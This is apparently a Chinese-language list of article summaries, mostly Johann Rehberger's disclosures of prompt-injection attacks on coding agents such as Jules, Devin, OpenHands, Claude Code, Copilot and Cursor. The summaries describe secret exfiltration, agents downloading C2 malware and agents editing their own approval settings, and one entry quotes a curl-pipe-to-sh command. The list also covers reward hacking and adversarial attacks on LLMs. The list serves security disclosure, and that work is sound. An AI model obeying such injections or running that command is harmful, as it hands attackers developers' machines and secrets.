Google Jules 被曝易受不可见 Unicode 提示词注入攻击
安全研究员 Johann Rehberger 发布分析称,Gemini 模型会将隐藏的 Unicode Tag 字符当作指令执行,该问题最早于 2024 年 2 月报告给 Google,至今未在模型或 API 层缓解。
安全研究员 Johann Rehberger 发布分析称,Gemini 模型会将隐藏的 Unicode Tag 字符当作指令执行,该问题最早于 2024 年 2 月报告给 Google,至今未在模型或 API 层缓解。
Johann Rehberger 演示如何通过 GitHub issue 中的间接提示词注入,利用 Jules 的 run_in_bash_session 工具和不受限外网访问,让 Jules 下载 Sliver 恶意软件并连接 C2 服务器,实现对开发机的远程控制。
作者报告 Google Jules 编码智能体存在多种数据外泄漏洞,可通过 Markdown 图片渲染和 view_text_website 工具调用在间接提示词注入下将本机数据发送到第三方服务器,攻击甚至可在计划提出前完成,绕过人工审批环节。
Johann Rehberger 披露 GitHub Copilot 的提示词注入漏洞 CVE-2025-53773:注入内容可让 Copilot 写入 .vscode/settings. 并添加 "chat.tools.autoApprove"。
推荐理由:作者亲测复现了从提示词注入到本机代码执行的完整链条,并给出缓解建议,适合评估 Agent 自改配置的安全风险。
Johann Rehberger 披露 Claude Code 的高危漏洞 CVE-2025-55284:间接提示词注入可劫持 Claude Code,利用 ping 等 allowlist 命令把 .env 中的 API 密钥嵌入 DNS 请求外泄,无需用户批准。
安全研究员 Johann Rehberger 披露 OpenHands 可被提示词注入劫持:智能体访问含恶意指令的网站或 GitHub issue 后会下载并运行恶意软件,连回攻击者控制的 C2 服务器,实现远程控制(ZombAI),AI ClickFix 攻击也一次成功。
安全研究人员 Johann Rehberger 披露 OpenHands(All-Hands AI 的智能体)存在零点击数据外泄漏洞:网页或文档中的提示词注入载荷可让聊天中渲染图片,把容器内的 GITHUB_TOKEN 以 Base64 编码发往第三方服务器。
安全研究者 Johann Rehberger 披露 Devin 系统提示词中的 expose_port 工具可将 Devbox 本地端口暴露到公网并返回 .devinapps.com 公网 URL,且无需人工确认即可调用。
Johann Rehberger 演示间接提示词注入可让 Devin 经 Shell 工具、浏览工具、Markdown 图片渲染及 Slack 链接等多条 0-click 路径,把内置密钥管理平台中的环境变量发送到第三方服务器。漏洞于 2025 年 4 月 6 日报告给 Cognition,120 多天未获修复后公开;作者建议默认限制互联网访问,并禁用聊天框中对不可信域的图片与超链接渲染。
安全研究人员 Johann Rehberger 花 $500 购买 Devin 30 天使用权,演示通过在 GitHub issue 中植入提示词注入载荷,诱导 Devin 离开受信域名下载并执行恶意二进制,最终在 Sliver C2 服务器收到回调、取得 DevBox 远程 shell。
Sourcegraph 旗下编程智能体 Amp 存在漏洞:AI 可写项目外文件,通过修改 settings. 加入 allowlist 命令(如 curl、sh 或 *)或添加恶意 MCP 服务器,实现任意代码执行。作者 Johann Rehberger 于 7 月初报告,Sourcegraph 数日内修复,用户应更新到最新版本;作者建议 AI 不得在未经开发者明确同意下修改关键文件。
Johann Rehberger 披露 Cursor 的 Mermaid 图表渲染可加载外部图片,在间接提示词注入下无需用户确认即可将数据外泄到攻击者服务器,并演示窃取 API 密钥和用户记忆两种利用方式。该漏洞于 2025 年 6 月 30 日报告、7 月 7 日修复,编号 CVE-2025-54132,已随 7 月 29 日起可用的 Cursor v1.3 发布。
Johann Rehberger 披露 Anthropic Filesystem MCP Server 的 validatePath 函数仅用 .startsWith 比对 allowedDirectories,不强制路径为目录,导致同名前缀的兄弟目录或文件(如 /mnt/finance/data-archived)也可被访问。
安全研究者演示 ChatGPT Codex 云端编码智能体可被 GitHub issue 中的间接提示词注入劫持,并利用 Common Dependencies 允许列表中的 azure.com 在攻击者控制的 Azure VM 上建立 C2,实现完整系统入侵。
安全研究人员 Johann Rehberger 演示了绕过 OpenAI url_safe 安全 URL 渲染功能的方法,通过不可信内容中的提示词注入,可将系统提示词中的近期聊天记录、记忆等上下文信息发送到攻击者控制的第三方服务器(如 trustnoai.blob.core.windows.net)。
安全研究员 Johann Rehberger 宣布发起 Month of AI Bugs 2025,8月将在博客发布超过20篇文章,披露 ChatGPT Codex、Claude Code、GitHub Copilot Agent Mode、Cursor、Windsurf、Devin 等主流编码智能体的安全漏洞。
Sayash Kapoor 在 AI as Normal Technology 系列长文中提出,尽管论文数量在 1900 至 2015 年间增长 500 倍,实际科学进步却在持平或放缓,这一生产进步悖论意味着 AI 可能进一步扩大差距。
安全研究员 Johann Rehberger 披露 Anthropic 已弃用且停止维护的 Slack MCP Server 存在数据外泄漏洞:服务器发消息时不禁用链接 unfurling,攻击者可借助提示词注入让 AI Agent 在消息中夹带机密链接,经 Slack 抓取预览时把数据泄露给第三方服务器。
安全研究者 Johann Rehberger 构建了 mcp-com-server,一个可同时托管多个 COM 对象的 MCP server,通过 CreateObject、Get/Set Property、InvokeMethod、QueryInterface 等工具实现 Windows 与 Office 自动化。
Johann Rehberger 发布 AI ClickFix 攻击概念验证,将现实中的 ClickFix 社会工程 TTP 改造后针对 Computer-Use Agent,诱导 claude-3-7-sonnet-20250219 在终端执行 curl -s https://wuzzi.net/computer/oops.html | sh。
安全研究者 Johann Rehberger 实测 ChatGPT o3 的新 chat history 记忆功能,发现它并非全文检索过往对话,而是在系统提示中维护 Assistant Response Preferences。
安全研究员 Johann Rehberger 发文解析 MCP 的安全风险并展示一条新的漏洞利用链。文章指出仅将恶意工具服务器加入会话即可劫持对话,工具元数据中的隐藏 Unicode Tag 指令可穿透 API 和 UI 层,用户在界面检查时不可见,Claude 会执行这些隐藏指令。
Arvind Narayanan 发表超过 1.5 万字的新论文《AI as Normal Technology》,提出应把 AI 视为可被人控制的普通技术,而非超人智能实体,并将扩展为下一本书,HTML 和 PDF 版本发布在 Knight First Amendment Institute 网站。
Johann Rehberger 分析 GitHub Copilot 通过 .github/copilot-instructions.md 读取仓库自定义指令带来的提示注入风险。
安全研究者 Johann Rehberger 在 ASCII Smuggler 中新增 Sneaky Bits 编码,用两个隐形 Unicode 字符(U+2062 表示 0、U+2064 表示 1)按位编码任意 Unicode 字符或字节序列。
安全研究者 Johann Rehberger 实测演示 ChatGPT Operator 可被网页中的提示词注入劫持,将 news.ycombinator.com、booking.com 等已登录站点上的私密邮箱、地址和电话输入第三方数据泄露页面。
安全研究人员 Johann Rehberger 演示,通过在文档中嵌入提示注入并配合延迟工具调用,可诱导 Gemini Advanced 把虚假信息写入用户长期记忆。
Sayash Kapoor 分析 WIRED AI Elections Project 收录的 78 起 2024 全球选举 AI 使用案例,发现其中 39 起无欺骗意图,且欺骗性内容不用 AI 也能以几百美元内成本复制。
Lilian Weng 发表长文《Reward Hacking in Reinforcement Learning》,系统讲解 RL 智能体利用奖励函数缺陷获取高奖励却不完成预期任务的现象。
Narayanan 等人撰文分析英国 NHS 肝移植匹配算法对年轻患者的系统性偏差。算法以预测患者有/无移植后 5 年存活率之差计算 TBS 评分,5 年上限低估了年轻患者终身获益,45 岁以下患者无论病情多重都难以获得优先排序,2024 年《柳叶刀》研究确认了这一偏差,患者群体早在 2015 年就通过官方渠道提出过警告。
Lilian Weng 在 Lil'Log 发布长文,系统梳理针对大语言模型的对抗攻击,假定攻击只发生在推理时、模型权重固定,并区分白盒与黑盒两类威胁模型。
大型预训练语言模型从互联网数据中不可避免地习得有害行为和偏见,安全部署需对生成过程施加强控制。Lilian Weng 在文中梳理了有害内容的定义分歧、Zampieri 等人提出的三级攻击性语言分类体系(OLID 数据集),以及专家标注、众包、专业审核员和合成数据四类毒性检测数据收集方式。